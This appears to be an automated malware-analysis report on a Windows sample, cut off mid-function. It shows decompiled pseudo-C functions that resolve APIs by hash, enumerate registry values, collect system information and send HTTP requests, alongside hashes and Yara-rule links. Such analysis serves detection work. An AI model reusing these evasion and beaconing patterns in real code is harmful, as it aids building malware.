0x00000000
0x003b48de
0x003b5033
0x00000000
0x003b5033
0x00000000
0x003b488d
0x003b488d
0x003b4893
0x003b4893
0x003b4899
0x00000000
0x003b4872
0x003b4870
0x003b4868
0x003b4841
0x003b50de
0x00000000
0x003b50de
0x00000000
0x003b47ee
0x003b47ee
0x003b47f4
0x003b47f4
0x003b47fa
0x00000000
0x003b47d3
0x003b47d1
0x00000000

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,?), ref: 003B48DA

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: cc2a9b24b4283b3498f3aa4692be26684ee36d415cc8021f3cfdf20894a5e568
Instruction ID: 6631988a912fe76615863dd30f53a3ffb0a017b23a5796ad3d4c039efd9c4c38
Opcode Fuzzy Hash: cc2a9b24b4283b3498f3aa4692be26684ee36d415cc8021f3cfdf20894a5e568
Instruction Fuzzy Hash: 961206207043429BDB27DE6988D57FA7299AB9470CF1A867EE741CBE53EF34CC048259

Uniqueness

Uniqueness Score: -1.00%

Function 003CC2D0, Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E003CC2D0(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, void* _a8, void* _a12) {
				char _v28;
				char _v32;
				unsigned int _v36;
				char _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				long* _v56;
				long _v60;
				long* _v64;
				int _v68;
				intOrPtr _v72;
				signed int _v76;
				long _v80;
				unsigned int _t57;
				signed int* _t59;
				void* _t62;
				void* _t66;
				void* _t74;
				long _t75;
				void* _t76;
				void** _t77;
				long _t78;
				long* _t82;
				void* _t83;
				long _t84;
				long _t102;
				short* _t107;
				long _t117;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				intOrPtr _t125;
				long _t127;
				void* _t130;
				long _t132;
				intOrPtr _t135;
				long _t136;
				long _t140;
				void* _t142;
				long* _t143;

				_push(__esi);
				_push(__edi);
				_t143 = _t142 - 0x40;
				_t82 = __ecx;
				E003B3930(__ecx, 0, __edi, __esi);
				_t130 =  !=  ? 0 : 0x100;
				_t121 =  <=  ? 0x3000f : 0x20009;
				_t122 = ( <=  ? 0x3000f : 0x20009) | 0x00000100;
				E003B8810( &_v40, 0x104);
				_t107 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t107 != 0) {
					 *_t107 = 0;
				}
				_t140 = _a8;
				_t57 = E003C9650(_a4) >> 2;
				if(_t57 > 0) {
					_v56 =  &(_t82[3]);
					_v44 = 0;
					_t16 = _t57 - 1; // -1
					_v76 = _t122;
					_v68 = _t16;
					_v72 = _t130 + 0x20009;
					_t132 = 0;
					_v52 = _t57;
					_v64 = _t82;
					_t123 = 0;
					while(1) {
						L15:
						_t59 = E003C9640(_a4, _t123 * 4);
						_t83 = 0;
						_v48 = _t123;
						_t124 =  *_t59 ^ 0x38ba5c7b;
						_v52 = _t132;
						while(1) {
							_t62 = E003B15C0(0x3ab94787, 0xf561ae8b);
							if(_t62 != 0) {
								break;
							}
							E003BA0D0( &_v40,  &_v32);
							E003B83B0( &_v28);
							_t66 = E003CD620(_v28, E003C6040(_v28, 0x7fffffff));
							E003C0B10( &_v28);
							if(_t66 != _t124) {
								E003B8CA0( &_v32);
								_t83 = _t83 + 1;
								continue;
							} else {
								_t125 = _v44;
								_t135 =  *((intOrPtr*)( &_v32 - 0x10));
								E003B8CA0( &_v32);
								if(_t125 != 0) {
									E003B96D0(_v56, 0x5c);
								}
								E003C0220(_v56, _v40, 0);
								_v68 = 0;
								if(E003B15C0(0x3ab94787, 0xd5493f9) == 0) {
									_t117 = 0;
								} else {
									_t77 =  &_v60;
									_t104 =  ==  ?  *((void*)(_t77 - 0x10)) :  *((intOrPtr*)(_t77 - 0xc));
									_t78 = RegOpenKeyExW(_a8,  *(_t77[1]), 0,  ==  ?  *((void*)(_t77 - 0x10)) :  *((intOrPtr*)(_t77 - 0xc)), _t77); // executed
									_t117 = _t78;
								}
								_t84 = _v60;
								if(_t84 == 0 || _t84 == 0xffffffff) {
									L37:
									_t82 = _v64;
									_t136 = _t117;
									goto L4;
								} else {
									if(_t135 == 0) {
										L34:
										_t123 = _t125 + 1;
										_t140 = _t84;
										if(_t123 < _v52) {
											_t132 = 1;
											goto L15;
										} else {
											goto L37;
										}
									} else {
										if(_t140 == 0 || _t140 == 0xffffffff) {
											_t75 = 1;
										} else {
											_t75 = 0;
										}
										if(_t75 != 0) {
											goto L34;
										} else {
											_v80 = _t117;
											_t76 = E003B15C0(0x3ab94787, 0x91935d4e);
											_t117 =  *_t143;
											if(_t76 == 0) {
												goto L34;
											} else {
												_push(_t140);
												_v80 = _t117;
												asm("int3");
												return _t76;
											}
										}
									}
								}
							}
							goto L38;
						}
						_push(_v36 >> 1);
						_push(_v40);
						_push(_t83);
						_push(_t140);
						asm("int3");
						return _t62;
						goto L38;
					}
				} else {
					_t136 = 0;
					L4:
					if(_t82[2] == 0) {
						L12:
						_t82[1] = _t140;
						_t82[2] = 1;
						E003B8CA0( &_v40);
						 *_t82 = _t136;
						return _t136;
					} else {
						_t127 = _t82[1];
						if(_t127 == 0 || _t127 == 0xffffffff) {
							_t102 = 1;
						} else {
							_t102 = 0;
						}
						if(_t102 != 0) {
							goto L12;
						} else {
							_t74 = E003B15C0(0x3ab94787, 0x91935d4e);
							if(_t74 == 0) {
								goto L12;
							} else {
								_push(_t127);
								asm("int3");
								return _t74;
							}
						}
					}
				}
				L38:
			}

0x003cc2d0
0x003cc2d1
0x003cc2d4
0x003cc2d7
0x003cc2db
0x003cc2f4
0x003cc30b
0x003cc30e
0x003cc310
0x003cc315
0x003cc31a
0x003cc31e
0x003cc31e
0x003cc325
0x003cc32e
0x003cc333
0x003cc393
0x003cc399
0x003cc39d
0x003cc3a0
0x003cc3a4
0x003cc3a8
0x003cc3ac
0x003cc3ae
0x003cc3b2
0x003cc3b6
0x003cc3bf
0x003cc3bf
0x003cc3cb
0x003cc3d2
0x003cc3d9
0x003cc3dd
0x003cc3df
0x003cc3e3
0x003cc3ed
0x003cc3f4
0x00000000
0x00000000
0x003cc418
0x003cc425
0x003cc43e
0x003cc449
0x003cc450
0x003cc523
0x003cc528
0x00000000
0x003cc456
0x003cc456
0x003cc45e
0x003cc461
0x003cc468
0x003cc470
0x003cc470
0x003cc47f
0x003cc484
0x003cc49f
0x003cc4c3
0x003cc4a1
0x003cc4a5
0x003cc4ac
0x003cc4bd
0x003cc4bf
0x003cc4bf
0x003cc4c5
0x003cc4cb
0x003cc537
0x003cc537
0x003cc53b
0x00000000
0x003cc4d2
0x003cc4d4
0x003cc510
0x003cc510
0x003cc511
0x003cc517
0x003cc3ba
0x00000000
0x003cc51d
0x00000000
0x003cc51d
0x003cc4d6
0x003cc4d8
0x003cc4e3
0x003cc4df
0x003cc4df
0x003cc4df
0x003cc4ea
0x00000000
0x003cc4ec
0x003cc4f6
0x003cc4fa
0x003cc4ff
0x003cc504
0x00000000
0x003cc506
0x003cc506
0x003cc507
0x003cc50b
0x003cc50c
0x003cc50c
0x003cc504
0x003cc4ea
0x003cc4d4
0x003cc4cb
0x00000000
0x003cc450
0x003cc3fc
0x003cc3fd
0x003cc401
0x003cc402
0x003cc403
0x003cc404
0x00000000
0x003cc404
0x003cc335
0x003cc335
0x003cc337
0x003cc33b
0x003cc36c
0x003cc36c
0x003cc373
0x003cc377
0x003cc37c
0x003cc387
0x003cc33d
0x003cc33d
0x003cc342
0x003cc34d
0x003cc349
0x003cc349
0x003cc349
0x003cc354
0x00000000
0x003cc356
0x003cc360
0x003cc367
0x00000000
0x003cc369
0x003cc369
0x003cc36a
0x003cc36b
0x003cc36b
0x003cc367
0x003cc354
0x003cc33b
0x00000000

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02b94c39eb1dd3cc4c03db39bb29c4b9ed014fec119dce0f03e24c3972616c08
Instruction ID: 929fa25e32294de99d2a7b1ff85ab65cf32e943428273e24682885eb18a69b73
Opcode Fuzzy Hash: 02b94c39eb1dd3cc4c03db39bb29c4b9ed014fec119dce0f03e24c3972616c08
Instruction Fuzzy Hash: 4D61CE356183009BC716DF25C890B6BB7E5AFC4354F158A2DF95ADB291EA30EC05CB92

Uniqueness

Uniqueness Score: -1.00%

Function 003B430F, Relevance: 1.7, APIs: 1, Instructions: 162
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E003B430F(void* __eax, intOrPtr __ebx, void* __esi, void* __ebp, char _a4, struct _SYSTEM_INFO _a344, intOrPtr _a356, intOrPtr _a360, intOrPtr _a364, short _a372, intOrPtr _a380, char _a384, char _a388, char _a400, char _a404, char _a408) {
				char _v0;
				void* _v4;
				char _v16;
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t48;
				intOrPtr _t54;
				intOrPtr _t56;
				intOrPtr _t59;
				intOrPtr _t64;
				void* _t69;

				_t47 = __ebx;
				if(__eax == 0) {
					E003C9510( &_a4);
					if(_a408 != 0) {
						E003CBE30( &_a404, __esi);
					}
				} else {
					__edx =  *0x3db1f4; // 0x2661568
					if(__edx == 0xc139578) {
						 *0x3db1f4 = 0;
						L26:
						__eax = 0x3ab94787;
						_push(0x3ab94787);
						_v4 = E003B7564(0x3ab94787);
						if(_v4 == 0) {
							__ecx = 0x3ab94787;
							__eax = E003B6C50(0x3ab94787);
							if(__al != 0) {
								__eax = 0x3ab94787;
								_push(0x3ab94787);
								 *__esp = E003B7564(0x3ab94787);
							}
						}
						if(_v4 == 0) {
							L42:
							__ecx =  &_v0;
							__eax = E003C9510( &_v0);
							if(_a404 != 0) {
								__ecx =  &_a400;
								__eax = E003CBE30( &_a400, __esi);
							}
							goto L1;
						} else {
							__esp = __esp + 0xfffffff8;
							__edx = 0xc4b8bd35;
							__eax = _v4;
							__edx = E003B67C8(_v4, 0xc4b8bd35);
							L29:
							if(__edx == 0) {
								goto L42;
							}
							 *__edi & 0x000000ff = ( *__edi & 0x000000ff) - 1;
							__eax =  *__edx( *__esi, ( *__edi & 0x000000ff) - 1);
							if(__eax == 0) {
								goto L42;
							}
							__eax =  *__eax;
							if(__eax == 0) {
								__esi = 1;
							} else {
								if(__eax == 0x1000) {
									__esi = 2;
								} else {
									if(__eax == 0x2100) {
										__esi = 4;
									} else {
										if(__eax == 0x2000) {
											__esi = 3;
										} else {
											if(__eax == 0x3000) {
												__esi = 5;
											} else {
												if(__eax != 0x4000) {
													__esi = 7;
													__esi =  !=  ? __ebx : 7;
												} else {
													__esi = 6;
												}
											}
										}
									}
								}
							}
							__ecx =  &_v16;
							__eax = E003C9510( &_v16);
							if(_a388 != 0) {
								__ecx =  &_a384;
								__eax = E003CBE30( &_a384, __esi);
							}
							L2:
							_t35 =  *0x3db1f0; // 0x26859a0
							 *((intOrPtr*)(_t35 + 0x2c)) = _t64;
							_t56 =  *0x3db1f4; // 0x2661568
							if(_t56 == 0xc139578) {
								 *0x3db1f4 = 0;
								L9:
								_push(0xa1310f65);
								_t48 = E003B7564(0xa1310f65);
								if(_t48 == 0) {
									if(E003B6C50(0xa1310f65) != 0) {
										_push(0xa1310f65);
										_t48 = E003B7564(0xa1310f65);
									}
								}
								if(_t48 == 0) {
									goto L14;
								} else {
									_t69 = _t69 + 0xfffffff8;
									_t59 = E003B67C8(_t48, 0x4e85f18d);
									goto L12;
								}
							} else {
								if(_t56 == 0) {
									goto L9;
								} else {
									goto L5;
								}
								do {
									L5:
									_t54 = _t47;
									_t45 = _t54;
									while( *((intOrPtr*)(_t45 + _t56 + 8)) != 0x4e85f18d) {
										_t54 = _t54 + 1;
										_t45 = _t45 + 0x18;
										if(_t54 < 0x10) {
											continue;
										}
										goto L8;
									}
									_t59 =  *((intOrPtr*)(_t45 + _t56 + 0x14));
									if(_t59 != 0) {
										L12:
										if(_t59 != 0) {
											GetSystemInfo( &_a344);
										}
										L14:
										_t39 =  *0x3db1f0; // 0x26859a0
										 *((short*)(_t39 + 0xe)) = _a372;
										 *((intOrPtr*)(_t39 + 0x10)) = _a356;
										 *((intOrPtr*)(_t39 + 0x14)) = _a360;
										 *((intOrPtr*)(_t39 + 0x18)) = _a364;
										 *((intOrPtr*)(_t39 + 0x1c)) = _a380;
										return _t39;
									} else {
										goto L9;
									}
									L8:
									asm("o16 nop [eax+eax]");
									_t4 = _t56 + 0x180; // 0x26890a8
									_t56 =  *_t4;
								} while (_t56 != 0);
								goto L9;
							}
						}
					}
					if(__edx == 0) {
						goto L26;
					} else {
						goto L22;
					}
					do {
						L22:
						__ecx = __ebx;
						__eax = __ecx;
						while( *((intOrPtr*)(__eax + __edx + 8)) != 0xc4b8bd35) {
							__ecx = __ecx + 1;
							__eax = __eax + 0x18;
							if(__ecx < 0x10) {
								continue;
							}
							goto L25;
						}
						__edx =  *((intOrPtr*)(__eax + __edx + 0x14));
						if(__edx != 0) {
							goto L29;
						}
						goto L26;
						L25:
						asm("o16 nop [eax+eax]");
						_t20 = __edx + 0x180; // 0x26890a8
						__edx =  *_t20;
					} while (__edx != 0);
					goto L26;
				}
				L1:
				_t64 = _t47;
				goto L2;
			}

0x003b430f
0x003b4313
0x003b444c
0x003b4459
0x003b4466
0x003b4466
0x003b4319
0x003b4319
0x003b4325
0x003b44f6
0x003b435a
0x003b435a
0x003b435f
0x003b4365
0x003b436c
0x003b44c0
0x003b44c5
0x003b44cc
0x003b44d2
0x003b44d7
0x003b44dd
0x003b44dd
0x003b44cc
0x003b4376
0x003b4420
0x003b4420
0x003b4424
0x003b4431
0x003b4437
0x003b443e
0x003b443e
0x00000000
0x003b437c
0x003b437c
0x003b437f
0x003b4384
0x003b438d
0x003b438f
0x003b4391
0x00000000
0x00000000
0x003b439a
0x003b439e
0x003b43a2
0x00000000
0x00000000
0x003b43a4
0x003b43a8
0x003b44b6
0x003b43ae
0x003b43b3
0x003b44ac
0x003b43b9
0x003b43be
0x003b44a2
0x003b43c4
0x003b43c9
0x003b4498
0x003b43cf
0x003b43d4
0x003b43f3
0x003b43d6
0x003b43db
0x003b43e4
0x003b43ee
0x003b43dd
0x003b43dd
0x003b43dd
0x003b43db
0x003b43d4
0x003b43c9
0x003b43be
0x003b43b3
0x003b43f8
0x003b43fc
0x003b4409
0x003b440f
0x003b4416
0x003b4416
0x003b4042
0x003b4042
0x003b4047
0x003b404a
0x003b4056
0x003b41cf
0x003b408b
0x003b4090
0x003b4096
0x003b409a
0x003b41a6
0x003b41b1
0x003b41b7
0x003b41b7
0x003b41a6
0x003b40a2
0x00000000
0x003b40a4
0x003b40ab
0x003b40b3
0x00000000
0x003b40b3
0x003b405c
0x003b405e
0x00000000
0x00000000
0x00000000
0x00000000
0x003b4060
0x003b4060
0x003b4060
0x003b4062
0x003b4064
0x003b4072
0x003b4073
0x003b4079
0x00000000
0x00000000
0x00000000
0x003b4079
0x003b41be
0x003b41c4
0x003b40b5
0x003b40b7
0x003b40c1
0x003b40c1
0x003b40c3
0x003b40c3
0x003b40eb
0x003b40ef
0x003b40f2
0x003b40f5
0x003b40f8
0x003b4107
0x003b41ca
0x00000000
0x003b41ca
0x003b407b
0x003b407b
0x003b4081
0x003b4081
0x003b4087
0x00000000
0x003b4060
0x003b4056
0x003b4376
0x003b432d
0x00000000
0x00000000
0x00000000
0x00000000
0x003b432f
0x003b432f
0x003b432f
0x003b4331
0x003b4333
0x003b4341
0x003b4342
0x003b4348
0x00000000
0x00000000
0x00000000
0x003b4348
0x003b44e5
0x003b44eb
0x00000000
0x00000000
0x00000000
0x003b434a
0x003b434a
0x003b4350
0x003b4350
0x003b4356
0x00000000
0x003b432f
0x003b4040
0x003b4040
0x00000000

APIs

GetSystemInfo.KERNEL32(?), ref: 003B40C1

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: e64a9aec30c5b5204715621e6f9fe66d9ea045ad009208693d21449e4814e062
Instruction ID: e9127a8f692713895fa56ac4306c84640c75974b61424458217130ac64c9974d
Opcode Fuzzy Hash: e64a9aec30c5b5204715621e6f9fe66d9ea045ad009208693d21449e4814e062
Instruction Fuzzy Hash: B751E334A083418BD72B9F18D4957EEB2D5AB85308F2E857ED7498BA97DB34CC80C746

Uniqueness

Uniqueness Score: -1.00%

Function 003D3820, Relevance: 1.7, APIs: 1, Instructions: 151
networkCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E003D3820(intOrPtr* __ecx) {
				void* __edi;
				void* __esi;
				intOrPtr _t39;
				void* _t40;
				intOrPtr _t43;
				void* _t44;
				void* _t48;
				long _t52;
				int _t53;
				intOrPtr _t59;
				void* _t67;
				intOrPtr* _t95;
				intOrPtr _t102;
				intOrPtr _t104;
				void* _t105;
				intOrPtr* _t107;
				void* _t109;
				intOrPtr* _t110;

				_t110 = _t109 - 0x60;
				_t107 = __ecx;
				_t39 =  *((intOrPtr*)(__ecx + 8));
				if(_t39 == 0 || _t39 == 0xffffffff) {
					_t40 = 1;
				} else {
					_t40 = 0;
				}
				if(_t40 != 0) {
					L26:
					_push(0);
					E003C9350( *((intOrPtr*)(_t110 + 0x78)));
					return  *((intOrPtr*)(_t110 + 0x74));
				} else {
					_t43 =  *((intOrPtr*)(_t107 + 0x10));
					if(_t43 == 0 || _t43 == 0xffffffff) {
						_t44 = 1;
					} else {
						_t44 = 0;
					}
					if(_t44 != 0) {
						goto L26;
					} else {
						_t75 = _t107 + 0x28;
						E003C7660(_t107 + 0x28, _t110 + 0x3c, 0x3d9424);
						E003B87A0(_t110 + 0x44);
						_t48 = E003B15C0(0xd27f045a, 0x336e58dc);
						_t98 = _t48;
						if(_t48 != 0) {
							 *_t110 =  *((intOrPtr*)(_t107 + 0x10));
							 *((intOrPtr*)(_t110 + 0xc)) =  *((intOrPtr*)(_t110 + 0x44));
							_t102 =  *((intOrPtr*)(_t107 + 0x28));
							 *(_t110 + 8) = E003C0180( *((intOrPtr*)(_t110 + 0x44)), 0x7fffffff, _t102);
							if(E003C9650( *((intOrPtr*)(_t110 + 0x78))) != 0) {
								 *((intOrPtr*)(_t110 + 4)) = E003C9640( *((intOrPtr*)(_t110 + 0x7c)), 0);
							} else {
								 *((intOrPtr*)(_t110 + 4)) = 0;
							}
							_t52 = E003C9650( *((intOrPtr*)(_t110 + 0x78)));
							_t103 =  !=  ?  *((void*)(_t110 + 0x18)) : _t102;
							_t53 = HttpSendRequestW( *(_t110 + 0x10),  !=  ?  *((void*)(_t110 + 0x18)) : _t102,  *(_t110 + 0x10),  *(_t110 + 8), _t52); // executed
							if(_t53 == 0) {
								_t104 = E003B7F00();
								E003C7560(_t75, _t98, _t104);
								if(_t104 != 0) {
									goto L12;
								} else {
									goto L17;
								}
							} else {
								E003C7560(_t75, _t98, _t103);
								L17:
								 *(_t110 + 0x50) = 4;
								_t95 = E003B15C0(0xd27f045a, 0xcedbd48c);
								if(_t95 == 0) {
									_t59 = 0x7f;
									goto L24;
								} else {
									_t105 = _t110 + 0x50;
									_push(0);
									_push(_t105);
									_push(_t110 + 0x4c);
									_push(0x20000013);
									_push( *((intOrPtr*)(_t107 + 0x10)));
									if( *_t95() == 0) {
										_t59 = E003B7F00();
										if(_t59 != 0) {
											L24:
											 *_t107 = _t59;
											E003B8CA0(_t110 + 0x44);
											goto L25;
										} else {
											goto L19;
										}
									} else {
										L19:
										 *((intOrPtr*)(_t107 + 0x34)) =  *((intOrPtr*)(_t110 + 0x4c));
										E003B8810(_t110 + 0x38, 0x2800);
										 *(_t110 + 0x50) =  *(_t110 + 0x38) >> 1;
										_t67 = E003B15C0(0xd27f045a, 0xcedbd48c);
										if(_t67 == 0) {
											 *_t107 = 0x7f;
											E003B8CA0(_t110 + 0x34);
											E003B8CA0(_t110 + 0x44);
											goto L25;
										} else {
											_push(0);
											_push(_t105);
											_push( *((intOrPtr*)(_t110 + 0x3c)));
											_push(0x14);
											_push( *((intOrPtr*)(_t107 + 0x10)));
											asm("int3");
											return _t67;
										}
									}
								}
							}
						} else {
							_t104 = 0x7f;
							E003C7560(_t75, _t98, 0x7f);
							L12:
							 *_t107 = _t104;
							E003B8CA0(_t110 + 0x44);
							L25:
							E003C0B10(_t110 + 0x3c);
							goto L26;
						}
					}
				}
			}

0x003d3824
0x003d3827
0x003d3829
0x003d382e
0x003d3839
0x003d3835
0x003d3835
0x003d3835
0x003d3840
0x003d3bba
0x003d3bba
0x003d3bc0
0x003d3bd0
0x003d3846
0x003d3846
0x003d384b
0x003d3856
0x003d3852
0x003d3852
0x003d3852
0x003d385d
0x00000000
0x003d3863
0x003d3863
0x003d3872
0x003d387f
0x003d388e
0x003d3893
0x003d3897
0x003d38c2
0x003d38c5
0x003d38c9
0x003d38d1
0x003d38e0
0x003d3ca0
0x003d38e6
0x003d38e6
0x003d38e6
0x003d38f2
0x003d3902
0x003d390c
0x003d3910
0x003d3c7f
0x003d3c83
0x003d3c8a
0x00000000
0x003d3c90
0x00000000
0x003d3c90
0x003d3916
0x003d3918
0x003d391d
0x003d391d
0x003d3934
0x003d3938
0x003d3ba0
0x00000000
0x003d393e
0x003d393e
0x003d3946
0x003d3948
0x003d3949
0x003d394a
0x003d394f
0x003d3956
0x003d3c68
0x003d3c6f
0x003d3ba5
0x003d3ba5
0x003d3bac
0x00000000
0x003d3c75
0x00000000
0x003d3c75
0x003d395c
0x003d395c
0x003d3965
0x003d396c
0x003d3977
0x003d3985
0x003d398c
0x003d3b89
0x003d3b90
0x003d3b99
0x00000000
0x003d3992
0x003d3992
0x003d3994
0x003d3995
0x003d3999
0x003d399b
0x003d399e
0x003d399f
0x003d399f
0x003d398c
0x003d3956
0x003d3938
0x003d3899
0x003d389b
0x003d38a0
0x003d38a5
0x003d38a5
0x003d38ac
0x003d3bb1
0x003d3bb5
0x00000000
0x003d3bb5
0x003d3897
0x003d385d

APIs

HttpSendRequestW.WININET(D27F045A,?,D27F045A,?,00000000,D27F045A,336E58DC,?), ref: 003D390C

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID: HttpRequestSend
String ID:
API String ID: 360639707-0
Opcode ID: f3146da786a6f035780eb28066bbc4c011ddfd00e136ae36f826e586eab253b7
Instruction ID: a9299186873375589addb2ea685635bd260cd32f0d230da237daf37bacf4e19d
Opcode Fuzzy Hash: f3146da786a6f035780eb28066bbc4c011ddfd00e136ae36f826e586eab253b7
Instruction Fuzzy Hash: 3A518132608305ABD722AF24DC51BAF7BE4AF80354F11492EF9569B391EB31DD04DB52

Uniqueness

Uniqueness Score: -1.00%

Function 003CC580, Relevance: 1.6, APIs: 1, Instructions: 98
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E003CC580(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v0;
				intOrPtr _v4;
				int _v20;
				char _v28;
				int* _v32;
				int* _v36;
				char _v40;
				char _v48;
				char _v303;
				void* __edi;
				void* __esi;
				long _t25;
				signed int _t33;
				char _t45;
				int _t62;
				intOrPtr _t63;
				char* _t64;
				char* _t66;

				_v40 = 0;
				_t62 = 0;
				_v36 = 0;
				_t63 = __ecx;
				_v32 = 0;
				_t64 = _t66;
				while(1) {
					_v20 = 0x105;
					if(E003B15C0(0x3ab94787, 0x31fb9d90) == 0) {
						goto L3;
					}
					_t25 = RegEnumValueA( *(_t63 + 4), _t62, _t64,  &_v20, 0, 0, 0, 0); // executed
					if(_t25 == 0) {
						goto L3;
					}
					_t45 = _v40;
					_t26 = 0;
					if(_t45 <= 0) {
						L9:
						E003C0930(_a4, _t26, _t26);
						E003C7560( &_v48, _t62, _t63);
						return _v4;
					} else {
						_t63 = _t45;
						_t65 = 0;
						_t62 =  &_v28;
						while(1) {
							E003C1240(E003C7600( &_v40, _t65), _t62);
							_t40 = _v36;
							_t33 = E003CD620(_t40, E003C6040(_v36, 0x7fffffff));
							E003C0B10(_t62);
							if((_t33 ^ 0x38ba5c7b) == _v0) {
								break;
							}
							_t65 =  &_v303;
							if( &_v303 < _t63) {
								continue;
							} else {
								_t26 = 0;
								goto L9;
							}
							goto L11;
						}
						E003C0750(_v0, E003C7600( &_v40, _t65));
						E003C7560( &_v48, _t62, _t63);
						return _v4;
					}
					L11:
					L3:
					E003C37E0( &_v40, _t64, _v40);
					_t62 = _t62 + 1;
				}
			}

0x003cc58e
0x003cc595
0x003cc597
0x003cc59e
0x003cc5a0
0x003cc5a7
0x003cc5aa
0x003cc5aa
0x003cc5c8
0x00000000
0x00000000
0x003cc5db
0x003cc5df
0x00000000
0x00000000
0x003cc5f8
0x003cc5ff
0x003cc603
0x003cc662
0x003cc66b
0x003cc677
0x003cc68d
0x003cc605
0x003cc607
0x003cc609
0x003cc60b
0x003cc612
0x003cc622
0x003cc627
0x003cc63e
0x003cc647
0x003cc659
0x00000000
0x00000000
0x003cc65b
0x003cc65e
0x00000000
0x003cc660
0x003cc660
0x00000000
0x003cc660
0x00000000
0x003cc65e
0x003cc6a7
0x003cc6b3
0x003cc6c9
0x003cc6c9
0x00000000
0x003cc5e1
0x003cc5f0
0x003cc5f5
0x003cc5f5

APIs

RegEnumValueA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,3AB94787,31FB9D90,?,?,3AB94787,31FB9D90), ref: 003CC5DB

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: ba2a740820d52dbdc197a3ff1383e4a4d127e2da814062f69d33e0f1834dfbb0
Instruction ID: 87eaf1af1ee0bd438d16c9c58591d133a2c951014573e611afbe1c1d6fa49c96
Opcode Fuzzy Hash: ba2a740820d52dbdc197a3ff1383e4a4d127e2da814062f69d33e0f1834dfbb0
Instruction Fuzzy Hash: FC318D712082445BC376EA29D891FEFB3D9ABD9300F10492DF5CEC7241EE716D558BA2

Uniqueness

Uniqueness Score: -1.00%

Function 003CC405, Relevance: 1.6, APIs: 1, Instructions: 83
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E003CC405(intOrPtr __eax, void* __edi, intOrPtr __ebp, void* _a8, int _a12, void* _a16, void* _a20, void** _a28, void** _a32, void** _a36, char _a40, unsigned int _a44, char _a48, void** _a52, void* _a64, void* _a68) {
				unsigned int _v0;
				void* _v4;
				unsigned int _v8;
				void* _v20;
				void* _v28;
				void* _t41;
				intOrPtr* _t42;
				void** _t45;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t51;

				_t51 = __ebp;
				_t49 = __eax;
				if(__eax != 0) {
					_t42 = _a16;
					goto L1;
				} else {
					do {
						__edx =  &_a48;
						__ecx =  &_a40;
						__eax = E003BA0D0( &_a40,  &_a48);
						__edx = _a44;
						__ecx =  &_a52;
						__eax = E003B83B0( &_a52);
						__esi = _a52;
						__ecx = __esi;
						__edx = 0x7fffffff;
						__eax = E003C6040(__esi, 0x7fffffff);
						__ecx = __esi;
						__edx = __eax;
						__esi = __eax;
						__ecx =  &_a52;
						__eax = E003C0B10( &_a52);
						if(__esi != __edi) {
							__ecx =  &_a48;
							__eax = E003B8CA0( &_a48);
							__ebx = __ebx + 1;
							goto L12;
						} else {
							__edi = _a36;
							__ecx =  &_a48;
							__esi =  *(__ecx - 0x10);
							__eax = E003B8CA0(__ecx);
							if(__edi != 0) {
								__ecx =  *(__esp + 0x1c);
								__eax = E003B96D0( *(__esp + 0x1c), 0x5c);
							}
							__ecx =  *(__esp + 0x20);
							__eax = E003C0220( *(__esp + 0x20), _a40, 0);
							_a12 = 0;
							__eax = E003B15C0(0x3ab94787, 0xd5493f9);
							__edx = __eax;
							if(__eax == 0) {
								__edx = 0;
							} else {
								__eax =  &_a20;
								__ecx =  *(__eax - 0xc);
								__ecx =  ==  ?  *((void*)(__eax - 0x10)) :  *(__eax - 0xc);
								__ebx = __eax[1];
								__eax = RegOpenKeyExW( *(__esp + 0x68),  *(__eax[1]), 0, __ecx, __eax); // executed
								__edx = __eax;
							}
							__ebx = _a20;
							if(__ebx == 0 || __ebx == 0xffffffff) {
								L34:
								__ebx = _a16;
								__esi = __edx;
								L1:
								if( *((char*)(_t42 + 8)) == 0) {
									L9:
									 *((intOrPtr*)(_t42 + 4)) = _t51;
									 *((char*)(_t42 + 8)) = 1;
									E003B8CA0( &_a40);
									 *_t42 = _t49;
									return _t49;
								} else {
									_t48 =  *((intOrPtr*)(_t42 + 4));
									if(_t48 == 0 || _t48 == 0xffffffff) {
										_t45 = 1;
									} else {
										_t45 = 0;
									}
									if(_t45 != 0) {
										goto L9;
									} else {
										_t41 = E003B15C0(0x3ab94787, 0x91935d4e);
										if(_t41 == 0) {
											goto L9;
										} else {
											_push(_t48);
											asm("int3");
											return _t41;
										}
									}
								}
							} else {
								if(__esi == 0) {
									L30:
									__edi =  &(__edi[0]);
									__ebp = __ebx;
									if(__edi < _a28) {
										__esi = 1;
										__eax = __edi * 4;
										__ecx =  *(__esp + 0x58);
										__eax = E003C9640( *(__esp + 0x58), __edi * 4);
										__eax =  *__eax;
										__ebx = 0;
										__eax = __eax ^ 0x38ba5c7b;
										_a32 = __edi;
										__edi = __eax;
										_a28 = 1;
										goto L12;
									} else {
										goto L34;
									}
								} else {
									if(__ebp == 0 || __ebp == 0xffffffff) {
										__eax = 1;
									} else {
										__eax = 0;
